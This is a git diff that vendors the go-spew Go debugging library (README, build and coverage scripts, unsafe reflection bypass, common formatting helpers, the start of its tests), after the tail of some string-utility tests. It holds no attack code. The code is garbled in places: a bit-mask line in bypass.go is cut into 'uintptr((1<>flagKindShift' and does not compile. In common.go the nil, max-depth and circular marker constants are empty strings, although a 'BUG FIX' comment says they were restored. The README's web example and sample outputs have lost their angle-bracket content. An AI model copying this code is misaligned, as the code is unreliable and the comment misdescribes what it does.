+ out = "this is a.test" + delimiters := []rune{' ', '.'} + + if x := Uncapitalize(in, delimiters...); x != out { + t.Errorf("Uncapitalize(%v) = %v, want %v", in, x, out) + } +} + +func TestSwapCase(t *testing.T) { + + in := "This Is A.Test" + out := "tHIS iS a.tEST" + + if x := SwapCase(in); x != out { + t.Errorf("SwapCase(%v) = %v, want %v", in, x, out) + } +} + +func TestInitials(t *testing.T) { + + // Test 1 + in := "John Doe.Ray" + out := "JD" + + if x := Initials(in); x != out { + t.Errorf("Initials(%v) = %v, want %v", in, x, out) + } + + // Test 2 + out = "JDR" + delimiters := []rune{' ', '.'} + + if x := Initials(in, delimiters...); x != out { + t.Errorf("Initials(%v) = %v, want %v", in, x, out) + } + +} + +// ****************************** EXAMPLES ******************************************** + +func ExampleWrap() { + + in := "Bob Manuel Bob Manuel" + wrapLength := 10 + + fmt.Println(Wrap(in, wrapLength)) + // Output: + // Bob Manuel + // Bob Manuel +} + +func ExampleWrapCustom_1() { + + in := "BobManuelBob Bob" + wrapLength := 10 + newLineStr := "" + wrapLongWords := false + + fmt.Println(WrapCustom(in, wrapLength, newLineStr, wrapLongWords)) + // Output: + // BobManuelBobBob +} + +func ExampleWrapCustom_2() { + + in := "BobManuelBob Bob" + wrapLength := 10 + newLineStr := "" + wrapLongWords := true + + fmt.Println(WrapCustom(in, wrapLength, newLineStr, wrapLongWords)) + // Output: + // BobManuelBob Bob +} + +func ExampleCapitalize() { + + in := "test is going.well.thank.you.for inquiring" // Compare input to CapitalizeFully example + delimiters := []rune{' ', '.'} + + fmt.Println(Capitalize(in)) + fmt.Println(Capitalize(in, delimiters...)) + // Output: + // Test Is Going.well.thank.you.for Inquiring + // Test Is Going.Well.Thank.You.For Inquiring +} + +func ExampleCapitalizeFully() { + + in := "tEsT iS goiNG.wELL.tHaNk.yOU.for inqUIrING" // Notice scattered capitalization + delimiters := []rune{' ', '.'} + + fmt.Println(CapitalizeFully(in)) + 
fmt.Println(CapitalizeFully(in, delimiters...)) + // Output: + // Test Is Going.well.thank.you.for Inquiring + // Test Is Going.Well.Thank.You.For Inquiring +} + +func ExampleUncapitalize() { + + in := "This Is A.Test" + delimiters := []rune{' ', '.'} + + fmt.Println(Uncapitalize(in)) + fmt.Println(Uncapitalize(in, delimiters...)) + // Output: + // this is a.Test + // this is a.test +} + +func ExampleSwapCase() { + + in := "This Is A.Test" + fmt.Println(SwapCase(in)) + // Output: + // tHIS iS a.tEST +} + +func ExampleInitials() { + + in := "John Doe.Ray" + delimiters := []rune{' ', '.'} + + fmt.Println(Initials(in)) + fmt.Println(Initials(in, delimiters...)) + // Output: + // JD + // JDR +} diff --git a/vendor/github.com/davecgh/go-spew/.gitignore b/vendor/github.com/davecgh/go-spew/.gitignore new file mode 100644 index 0000000000..00268614f0 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/.gitignore @@ -0,0 +1,22 @@ +# Compiled Object files, Static and Dynamic libs (Shared Objects) +*.o +*.a +*.so + +# Folders +_obj +_test + +# Architecture specific extensions/prefixes +*.[568vq] +[568vq].out + +*.cgo1.go +*.cgo2.c +_cgo_defun.c +_cgo_gotypes.go +_cgo_export.* + +_testmain.go + +*.exe diff --git a/vendor/github.com/davecgh/go-spew/.travis.yml b/vendor/github.com/davecgh/go-spew/.travis.yml new file mode 100644 index 0000000000..984e0736e7 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/.travis.yml @@ -0,0 +1,14 @@ +language: go +go: + - 1.5.4 + - 1.6.3 + - 1.7 +install: + - go get -v golang.org/x/tools/cmd/cover +script: + - go test -v -tags=safe ./spew + - go test -v -tags=testcgo ./spew -covermode=count -coverprofile=profile.cov +after_success: + - go get -v github.com/mattn/goveralls + - export PATH=$PATH:$HOME/gopath/bin + - goveralls -coverprofile=profile.cov -service=travis-ci diff --git a/vendor/github.com/davecgh/go-spew/LICENSE b/vendor/github.com/davecgh/go-spew/LICENSE new file mode 100644 index 0000000000..c836416192 --- /dev/null +++ 
b/vendor/github.com/davecgh/go-spew/LICENSE @@ -0,0 +1,15 @@ +ISC License + +Copyright (c) 2012-2016 Dave Collins + +Permission to use, copy, modify, and distribute this software for any +purpose with or without fee is hereby granted, provided that the above +copyright notice and this permission notice appear in all copies. + +THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. diff --git a/vendor/github.com/davecgh/go-spew/README.md b/vendor/github.com/davecgh/go-spew/README.md new file mode 100644 index 0000000000..262430449b --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/README.md @@ -0,0 +1,205 @@ +go-spew +======= + +[![Build Status](https://img.shields.io/travis/davecgh/go-spew.svg)] +(https://travis-ci.org/davecgh/go-spew) [![ISC License] +(http://img.shields.io/badge/license-ISC-blue.svg)](http://copyfree.org) [![Coverage Status] +(https://img.shields.io/coveralls/davecgh/go-spew.svg)] +(https://coveralls.io/r/davecgh/go-spew?branch=master) + + +Go-spew implements a deep pretty printer for Go data structures to aid in +debugging. A comprehensive suite of tests with 100% test coverage is provided +to ensure proper functionality. See `test_coverage.txt` for the gocov coverage +report. Go-spew is licensed under the liberal ISC license, so it may be used in +open source or commercial projects. 
+ +If you're interested in reading about how this package came to life and some +of the challenges involved in providing a deep pretty printer, there is a blog +post about it +[here](https://web.archive.org/web/20160304013555/https://blog.cyphertite.com/go-spew-a-journey-into-dumping-go-data-structures/). + +## Documentation + +[![GoDoc](https://img.shields.io/badge/godoc-reference-blue.svg)] +(http://godoc.org/github.com/davecgh/go-spew/spew) + +Full `go doc` style documentation for the project can be viewed online without +installing this package by using the excellent GoDoc site here: +http://godoc.org/github.com/davecgh/go-spew/spew + +You can also view the documentation locally once the package is installed with +the `godoc` tool by running `godoc -http=":6060"` and pointing your browser to +http://localhost:6060/pkg/github.com/davecgh/go-spew/spew + +## Installation + +```bash +$ go get -u github.com/davecgh/go-spew/spew +``` + +## Quick Start + +Add this import line to the file you're working in: + +```Go +import "github.com/davecgh/go-spew/spew" +``` + +To dump a variable with full newlines, indentation, type, and pointer +information use Dump, Fdump, or Sdump: + +```Go +spew.Dump(myVar1, myVar2, ...) +spew.Fdump(someWriter, myVar1, myVar2, ...) +str := spew.Sdump(myVar1, myVar2, ...) +``` + +Alternatively, if you would prefer to use format strings with a compacted inline +printing style, use the convenience wrappers Printf, Fprintf, etc with %v (most +compact), %+v (adds pointer addresses), %#v (adds types), or %#+v (adds types +and pointer addresses): + +```Go +spew.Printf("myVar1: %v -- myVar2: %+v", myVar1, myVar2) +spew.Printf("myVar3: %#v -- myVar4: %#+v", myVar3, myVar4) +spew.Fprintf(someWriter, "myVar1: %v -- myVar2: %+v", myVar1, myVar2) +spew.Fprintf(someWriter, "myVar3: %#v -- myVar4: %#+v", myVar3, myVar4) +``` + +## Debugging a Web Application Example + +Here is an example of how you can use `spew.Sdump()` to help debug a web application. 
Please be sure to wrap your output using the `html.EscapeString()` function for safety reasons. You should also only use this debugging technique in a development environment, never in production. + +```Go +package main + +import ( + "fmt" + "html" + "net/http" + + "github.com/davecgh/go-spew/spew" +) + +func handler(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "text/html") + fmt.Fprintf(w, "Hi there, %s!", r.URL.Path[1:]) + fmt.Fprintf(w, "") +} + +func main() { + http.HandleFunc("/", handler) + http.ListenAndServe(":8080", nil) +} +``` + +## Sample Dump Output + +``` +(main.Foo) { + unexportedField: (*main.Bar)(0xf84002e210)({ + flag: (main.Flag) flagTwo, + data: (uintptr) + }), + ExportedField: (map[interface {}]interface {}) { + (string) "one": (bool) true + } +} +([]uint8) { + 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 |............... | + 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 |!"#$%&'()*+,-./0| + 00000020 31 32 |12| +} +``` + +## Sample Formatter Output + +Double pointer to a uint8: +``` + %v: <**>5 + %+v: <**>(0xf8400420d0->0xf8400420c8)5 + %#v: (**uint8)5 + %#+v: (**uint8)(0xf8400420d0->0xf8400420c8)5 +``` + +Pointer to circular struct with a uint8 field and a pointer to itself: +``` + %v: <*>{1 <*>} + %+v: <*>(0xf84003e260){ui8:1 c:<*>(0xf84003e260)} + %#v: (*main.circular){ui8:(uint8)1 c:(*main.circular)} + %#+v: (*main.circular)(0xf84003e260){ui8:(uint8)1 c:(*main.circular)(0xf84003e260)} +``` + +## Configuration Options + +Configuration of spew is handled by fields in the ConfigState type. For +convenience, all of the top-level functions use a global state available via the +spew.Config global. + +It is also possible to create a ConfigState instance that provides methods +equivalent to the top-level functions. This allows concurrent configuration +options. See the ConfigState documentation for more details. + +``` +* Indent + String to use for each indentation level for Dump functions. 
+ It is a single space by default. A popular alternative is "\t". + +* MaxDepth + Maximum number of levels to descend into nested data structures. + There is no limit by default. + +* DisableMethods + Disables invocation of error and Stringer interface methods. + Method invocation is enabled by default. + +* DisablePointerMethods + Disables invocation of error and Stringer interface methods on types + which only accept pointer receivers from non-pointer variables. This option + relies on access to the unsafe package, so it will not have any effect when + running in environments without access to the unsafe package such as Google + App Engine or with the "safe" build tag specified. + Pointer method invocation is enabled by default. + +* DisablePointerAddresses + DisablePointerAddresses specifies whether to disable the printing of + pointer addresses. This is useful when diffing data structures in tests. + +* DisableCapacities + DisableCapacities specifies whether to disable the printing of capacities + for arrays, slices, maps and channels. This is useful when diffing data + structures in tests. + +* ContinueOnMethod + Enables recursion into types after invoking error and Stringer interface + methods. Recursion after method invocation is disabled by default. + +* SortKeys + Specifies map keys should be sorted before being printed. Use + this to have a more deterministic, diffable output. Note that + only native types (bool, int, uint, floats, uintptr and string) + and types which implement error or Stringer interfaces are supported, + with other types sorted according to the reflect.Value.String() output + which guarantees display stability. Natural map order is used by + default. + +* SpewKeys + SpewKeys specifies that, as a last resort attempt, map keys should be + spewed to strings and sorted by those strings. This is only considered + if SortKeys is true. 
+ +``` + +## Unsafe Package Dependency + +This package relies on the unsafe package to perform some of the more advanced +features, however it also supports a "limited" mode which allows it to work in +environments where the unsafe package is not available. By default, it will +operate in this mode on Google App Engine and when compiled with GopherJS. The +"safe" build tag may also be specified to force the package to build without +using the unsafe package. + +## License + +Go-spew is licensed under the [copyfree](http://copyfree.org) ISC License. diff --git a/vendor/github.com/davecgh/go-spew/cov_report.sh b/vendor/github.com/davecgh/go-spew/cov_report.sh new file mode 100644 index 0000000000..9579497e41 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/cov_report.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# This script uses gocov to generate a test coverage report. +# The gocov tool my be obtained with the following command: +# go get github.com/axw/gocov/gocov +# +# It will be installed to $GOPATH/bin, so ensure that location is in your $PATH. + +# Check for gocov. +if ! type gocov >/dev/null 2>&1; then + echo >&2 "This script requires the gocov tool." + echo >&2 "You may obtain it with the following command:" + echo >&2 "go get github.com/axw/gocov/gocov" + exit 1 +fi + +# Only run the cgo tests if gcc is installed. +if type gcc >/dev/null 2>&1; then + (cd spew && gocov test -tags testcgo | gocov report) +else + (cd spew && gocov test | gocov report) +fi diff --git a/vendor/github.com/davecgh/go-spew/spew/bypass.go b/vendor/github.com/davecgh/go-spew/spew/bypass.go new file mode 100644 index 0000000000..8a4a6589a2 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/bypass.go @@ -0,0 +1,152 @@ +// Copyright (c) 2015-2016 Dave Collins +// +// Permission to use, copy, modify, and distribute this software for any +// purpose with or without fee is hereby granted, provided that the above +// copyright notice and this permission notice appear in all copies. 
+// +// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +// NOTE: Due to the following build constraints, this file will only be compiled +// when the code is not running on Google App Engine, compiled by GopherJS, and +// "-tags safe" is not added to the go build command line. The "disableunsafe" +// tag is deprecated and thus should not be used. +// +build !js,!appengine,!safe,!disableunsafe + +package spew + +import ( + "reflect" + "unsafe" +) + +const ( + // UnsafeDisabled is a build-time constant which specifies whether or + // not access to the unsafe package is available. + UnsafeDisabled = false + + // ptrSize is the size of a pointer on the current arch. + ptrSize = unsafe.Sizeof((*byte)(nil)) +) + +var ( + // offsetPtr, offsetScalar, and offsetFlag are the offsets for the + // internal reflect.Value fields. These values are valid before golang + // commit ecccf07e7f9d which changed the format. The are also valid + // after commit 82f48826c6c7 which changed the format again to mirror + // the original format. Code in the init function updates these offsets + // as necessary. + offsetPtr = uintptr(ptrSize) + offsetScalar = uintptr(0) + offsetFlag = uintptr(ptrSize * 2) + + // flagKindWidth and flagKindShift indicate various bits that the + // reflect package uses internally to track kind information. + // + // flagRO indicates whether or not the value field of a reflect.Value is + // read-only. 
+ // + // flagIndir indicates whether the value field of a reflect.Value is + // the actual data or a pointer to the data. + // + // These values are valid before golang commit 90a7c3c86944 which + // changed their positions. Code in the init function updates these + // flags as necessary. + flagKindWidth = uintptr(5) + flagKindShift = uintptr(flagKindWidth - 1) + flagRO = uintptr(1 << 0) + flagIndir = uintptr(1 << 1) +) + +func init() { + // Older versions of reflect.Value stored small integers directly in the + // ptr field (which is named val in the older versions). Versions + // between commits ecccf07e7f9d and 82f48826c6c7 added a new field named + // scalar for this purpose which unfortunately came before the flag + // field, so the offset of the flag field is different for those + // versions. + // + // This code constructs a new reflect.Value from a known small integer + // and checks if the size of the reflect.Value struct indicates it has + // the scalar field. When it does, the offsets are updated accordingly. + vv := reflect.ValueOf(0xf00) + if unsafe.Sizeof(vv) == (ptrSize * 4) { + offsetScalar = ptrSize * 2 + offsetFlag = ptrSize * 3 + } + + // Commit 90a7c3c86944 changed the flag positions such that the low + // order bits are the kind. This code extracts the kind from the flags + // field and ensures it's the correct type. When it's not, the flag + // order has been changed to the newer format, so the flags are updated + // accordingly. + upf := unsafe.Pointer(uintptr(unsafe.Pointer(&vv)) + offsetFlag) + upfv := *(*uintptr)(upf) + flagKindMask := uintptr((1<>flagKindShift != uintptr(reflect.Int) { + flagKindShift = 0 + flagRO = 1 << 5 + flagIndir = 1 << 6 + + // Commit adf9b30e5594 modified the flags to separate the + // flagRO flag into two bits which specifies whether or not the + // field is embedded. This causes flagIndir to move over a bit + // and means that flagRO is the combination of either of the + // original flagRO bit and the new bit. 
+ // + // This code detects the change by extracting what used to be + // the indirect bit to ensure it's set. When it's not, the flag + // order has been changed to the newer format, so the flags are + // updated accordingly. + if upfv&flagIndir == 0 { + flagRO = 3 << 5 + flagIndir = 1 << 7 + } + } +} + +// unsafeReflectValue converts the passed reflect.Value into a one that bypasses +// the typical safety restrictions preventing access to unaddressable and +// unexported data. It works by digging the raw pointer to the underlying +// value out of the protected value and generating a new unprotected (unsafe) +// reflect.Value to it. +// +// This allows us to check for implementations of the Stringer and error +// interfaces to be used for pretty printing ordinarily unaddressable and +// inaccessible values such as unexported struct fields. +func unsafeReflectValue(v reflect.Value) (rv reflect.Value) { + indirects := 1 + vt := v.Type() + upv := unsafe.Pointer(uintptr(unsafe.Pointer(&v)) + offsetPtr) + rvf := *(*uintptr)(unsafe.Pointer(uintptr(unsafe.Pointer(&v)) + offsetFlag)) + if rvf&flagIndir != 0 { + vt = reflect.PtrTo(v.Type()) + indirects++ + } else if offsetScalar != 0 { + // The value is in the scalar field when it's not one of the + // reference types. 
+ switch vt.Kind() { + case reflect.Uintptr: + case reflect.Chan: + case reflect.Func: + case reflect.Map: + case reflect.Ptr: + case reflect.UnsafePointer: + default: + upv = unsafe.Pointer(uintptr(unsafe.Pointer(&v)) + + offsetScalar) + } + } + + pv := reflect.NewAt(vt, upv) + rv = pv + for i := 0; i < indirects; i++ { + rv = rv.Elem() + } + return rv +} diff --git a/vendor/github.com/davecgh/go-spew/spew/bypasssafe.go b/vendor/github.com/davecgh/go-spew/spew/bypasssafe.go new file mode 100644 index 0000000000..1fe3cf3d5d --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/bypasssafe.go @@ -0,0 +1,38 @@ +// Copyright (c) 2015-2016 Dave Collins +// +// Permission to use, copy, modify, and distribute this software for any +// purpose with or without fee is hereby granted, provided that the above +// copyright notice and this permission notice appear in all copies. +// +// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +// NOTE: Due to the following build constraints, this file will only be compiled +// when the code is running on Google App Engine, compiled by GopherJS, or +// "-tags safe" is added to the go build command line. The "disableunsafe" +// tag is deprecated and thus should not be used. +// +build js appengine safe disableunsafe + +package spew + +import "reflect" + +const ( + // UnsafeDisabled is a build-time constant which specifies whether or + // not access to the unsafe package is available. 
+ UnsafeDisabled = true +) + +// unsafeReflectValue typically converts the passed reflect.Value into a one +// that bypasses the typical safety restrictions preventing access to +// unaddressable and unexported data. However, doing this relies on access to +// the unsafe package. This is a stub version which simply returns the passed +// reflect.Value when the unsafe package is not available. +func unsafeReflectValue(v reflect.Value) reflect.Value { + return v +} diff --git a/vendor/github.com/davecgh/go-spew/spew/common.go b/vendor/github.com/davecgh/go-spew/spew/common.go new file mode 100644 index 0000000000..7c519ff47a --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/common.go @@ -0,0 +1,341 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +package spew + +import ( + "bytes" + "fmt" + "io" + "reflect" + "sort" + "strconv" +) + +// Some constants in the form of bytes to avoid string overhead. This mirrors +// the technique used in the fmt package. 
// Some constants in the form of bytes to avoid string overhead. This mirrors
// the technique used in the fmt package.
//
// BUG FIX: the angle-bracketed sentinel literals ("<nil>", "<max depth
// reached>", "<max>", "<already shown>", "<shown>", "<invalid>") had been
// stripped to empty strings by markup mangling, which would make dump output
// silently omit its nil/depth/circular markers. Restored to the upstream
// go-spew values.
var (
	panicBytes            = []byte("(PANIC=")
	plusBytes             = []byte("+")
	iBytes                = []byte("i")
	trueBytes             = []byte("true")
	falseBytes            = []byte("false")
	interfaceBytes        = []byte("(interface {})")
	commaNewlineBytes     = []byte(",\n")
	newlineBytes          = []byte("\n")
	openBraceBytes        = []byte("{")
	openBraceNewlineBytes = []byte("{\n")
	closeBraceBytes       = []byte("}")
	asteriskBytes         = []byte("*")
	colonBytes            = []byte(":")
	colonSpaceBytes       = []byte(": ")
	openParenBytes        = []byte("(")
	closeParenBytes       = []byte(")")
	spaceBytes            = []byte(" ")
	pointerChainBytes     = []byte("->")
	nilAngleBytes         = []byte("<nil>")
	maxNewlineBytes       = []byte("<max depth reached>\n")
	maxShortBytes         = []byte("<max>")
	circularBytes         = []byte("<already shown>")
	circularShortBytes    = []byte("<shown>")
	invalidAngleBytes     = []byte("<invalid>")
	openBracketBytes      = []byte("[")
	closeBracketBytes     = []byte("]")
	percentBytes          = []byte("%")
	precisionBytes        = []byte(".")
	openAngleBytes        = []byte("<")
	closeAngleBytes       = []byte(">")
	openMapBytes          = []byte("map[")
	closeMapBytes         = []byte("]")
	lenEqualsBytes        = []byte("len=")
	capEqualsBytes        = []byte("cap=")
)

// hexDigits is used to map a decimal value to a hex digit.
var hexDigits = "0123456789abcdef"

// catchPanic handles any panics that might occur during the handleMethods
// calls. It must be invoked via defer; it recovers the panic value and writes
// "(PANIC=<value>)" to w so the surrounding dump can continue.
func catchPanic(w io.Writer, v reflect.Value) {
	if err := recover(); err != nil {
		w.Write(panicBytes)
		fmt.Fprintf(w, "%v", err)
		w.Write(closeParenBytes)
	}
}
However, the reflect package won't give us an + // interface on certain things like unexported struct fields in order + // to enforce visibility rules. We use unsafe, when it's available, + // to bypass these restrictions since this package does not mutate the + // values. + if !v.CanInterface() { + if UnsafeDisabled { + return false + } + + v = unsafeReflectValue(v) + } + + // Choose whether or not to do error and Stringer interface lookups against + // the base type or a pointer to the base type depending on settings. + // Technically calling one of these methods with a pointer receiver can + // mutate the value, however, types which choose to satisify an error or + // Stringer interface with a pointer receiver should not be mutating their + // state inside these interface methods. + if !cs.DisablePointerMethods && !UnsafeDisabled && !v.CanAddr() { + v = unsafeReflectValue(v) + } + if v.CanAddr() { + v = v.Addr() + } + + // Is it an error or Stringer? + switch iface := v.Interface().(type) { + case error: + defer catchPanic(w, v) + if cs.ContinueOnMethod { + w.Write(openParenBytes) + w.Write([]byte(iface.Error())) + w.Write(closeParenBytes) + w.Write(spaceBytes) + return false + } + + w.Write([]byte(iface.Error())) + return true + + case fmt.Stringer: + defer catchPanic(w, v) + if cs.ContinueOnMethod { + w.Write(openParenBytes) + w.Write([]byte(iface.String())) + w.Write(closeParenBytes) + w.Write(spaceBytes) + return false + } + w.Write([]byte(iface.String())) + return true + } + return false +} + +// printBool outputs a boolean value as true or false to Writer w. +func printBool(w io.Writer, val bool) { + if val { + w.Write(trueBytes) + } else { + w.Write(falseBytes) + } +} + +// printInt outputs a signed integer value to Writer w. +func printInt(w io.Writer, val int64, base int) { + w.Write([]byte(strconv.FormatInt(val, base))) +} + +// printUint outputs an unsigned integer value to Writer w. 
+func printUint(w io.Writer, val uint64, base int) { + w.Write([]byte(strconv.FormatUint(val, base))) +} + +// printFloat outputs a floating point value using the specified precision, +// which is expected to be 32 or 64bit, to Writer w. +func printFloat(w io.Writer, val float64, precision int) { + w.Write([]byte(strconv.FormatFloat(val, 'g', -1, precision))) +} + +// printComplex outputs a complex value using the specified float precision +// for the real and imaginary parts to Writer w. +func printComplex(w io.Writer, c complex128, floatPrecision int) { + r := real(c) + w.Write(openParenBytes) + w.Write([]byte(strconv.FormatFloat(r, 'g', -1, floatPrecision))) + i := imag(c) + if i >= 0 { + w.Write(plusBytes) + } + w.Write([]byte(strconv.FormatFloat(i, 'g', -1, floatPrecision))) + w.Write(iBytes) + w.Write(closeParenBytes) +} + +// printHexPtr outputs a uintptr formatted as hexidecimal with a leading '0x' +// prefix to Writer w. +func printHexPtr(w io.Writer, p uintptr) { + // Null pointer. + num := uint64(p) + if num == 0 { + w.Write(nilAngleBytes) + return + } + + // Max uint64 is 16 bytes in hex + 2 bytes for '0x' prefix + buf := make([]byte, 18) + + // It's simpler to construct the hex string right to left. + base := uint64(16) + i := len(buf) - 1 + for num >= base { + buf[i] = hexDigits[num%base] + num /= base + i-- + } + buf[i] = hexDigits[num] + + // Add '0x' prefix. + i-- + buf[i] = 'x' + i-- + buf[i] = '0' + + // Strip unused leading bytes. + buf = buf[i:] + w.Write(buf) +} + +// valuesSorter implements sort.Interface to allow a slice of reflect.Value +// elements to be sorted. +type valuesSorter struct { + values []reflect.Value + strings []string // either nil or same len and values + cs *ConfigState +} + +// newValuesSorter initializes a valuesSorter instance, which holds a set of +// surrogate keys on which the data should be sorted. It uses flags in +// ConfigState to decide if and how to populate those surrogate keys. 
+func newValuesSorter(values []reflect.Value, cs *ConfigState) sort.Interface { + vs := &valuesSorter{values: values, cs: cs} + if canSortSimply(vs.values[0].Kind()) { + return vs + } + if !cs.DisableMethods { + vs.strings = make([]string, len(values)) + for i := range vs.values { + b := bytes.Buffer{} + if !handleMethods(cs, &b, vs.values[i]) { + vs.strings = nil + break + } + vs.strings[i] = b.String() + } + } + if vs.strings == nil && cs.SpewKeys { + vs.strings = make([]string, len(values)) + for i := range vs.values { + vs.strings[i] = Sprintf("%#v", vs.values[i].Interface()) + } + } + return vs +} + +// canSortSimply tests whether a reflect.Kind is a primitive that can be sorted +// directly, or whether it should be considered for sorting by surrogate keys +// (if the ConfigState allows it). +func canSortSimply(kind reflect.Kind) bool { + // This switch parallels valueSortLess, except for the default case. + switch kind { + case reflect.Bool: + return true + case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int: + return true + case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint: + return true + case reflect.Float32, reflect.Float64: + return true + case reflect.String: + return true + case reflect.Uintptr: + return true + case reflect.Array: + return true + } + return false +} + +// Len returns the number of values in the slice. It is part of the +// sort.Interface implementation. +func (s *valuesSorter) Len() int { + return len(s.values) +} + +// Swap swaps the values at the passed indices. It is part of the +// sort.Interface implementation. +func (s *valuesSorter) Swap(i, j int) { + s.values[i], s.values[j] = s.values[j], s.values[i] + if s.strings != nil { + s.strings[i], s.strings[j] = s.strings[j], s.strings[i] + } +} + +// valueSortLess returns whether the first value should sort before the second +// value. It is used by valueSorter.Less as part of the sort.Interface +// implementation. 
+func valueSortLess(a, b reflect.Value) bool { + switch a.Kind() { + case reflect.Bool: + return !a.Bool() && b.Bool() + case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int: + return a.Int() < b.Int() + case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint: + return a.Uint() < b.Uint() + case reflect.Float32, reflect.Float64: + return a.Float() < b.Float() + case reflect.String: + return a.String() < b.String() + case reflect.Uintptr: + return a.Uint() < b.Uint() + case reflect.Array: + // Compare the contents of both arrays. + l := a.Len() + for i := 0; i < l; i++ { + av := a.Index(i) + bv := b.Index(i) + if av.Interface() == bv.Interface() { + continue + } + return valueSortLess(av, bv) + } + } + return a.String() < b.String() +} + +// Less returns whether the value at index i should sort before the +// value at index j. It is part of the sort.Interface implementation. +func (s *valuesSorter) Less(i, j int) bool { + if s.strings == nil { + return valueSortLess(s.values[i], s.values[j]) + } + return s.strings[i] < s.strings[j] +} + +// sortValues is a sort function that handles both native types and any type that +// can be converted to error or Stringer. Other inputs are sorted according to +// their Value.String() value to ensure display stability. +func sortValues(values []reflect.Value, cs *ConfigState) { + if len(values) == 0 { + return + } + sort.Sort(newValuesSorter(values, cs)) +} diff --git a/vendor/github.com/davecgh/go-spew/spew/common_test.go b/vendor/github.com/davecgh/go-spew/spew/common_test.go new file mode 100644 index 0000000000..0f5ce47dca --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/common_test.go @@ -0,0 +1,298 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. 
+ * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +package spew_test + +import ( + "fmt" + "reflect" + "testing" + + "github.com/davecgh/go-spew/spew" +) + +// custom type to test Stinger interface on non-pointer receiver. +type stringer string + +// String implements the Stringer interface for testing invocation of custom +// stringers on types with non-pointer receivers. +func (s stringer) String() string { + return "stringer " + string(s) +} + +// custom type to test Stinger interface on pointer receiver. +type pstringer string + +// String implements the Stringer interface for testing invocation of custom +// stringers on types with only pointer receivers. +func (s *pstringer) String() string { + return "stringer " + string(*s) +} + +// xref1 and xref2 are cross referencing structs for testing circular reference +// detection. +type xref1 struct { + ps2 *xref2 +} +type xref2 struct { + ps1 *xref1 +} + +// indirCir1, indirCir2, and 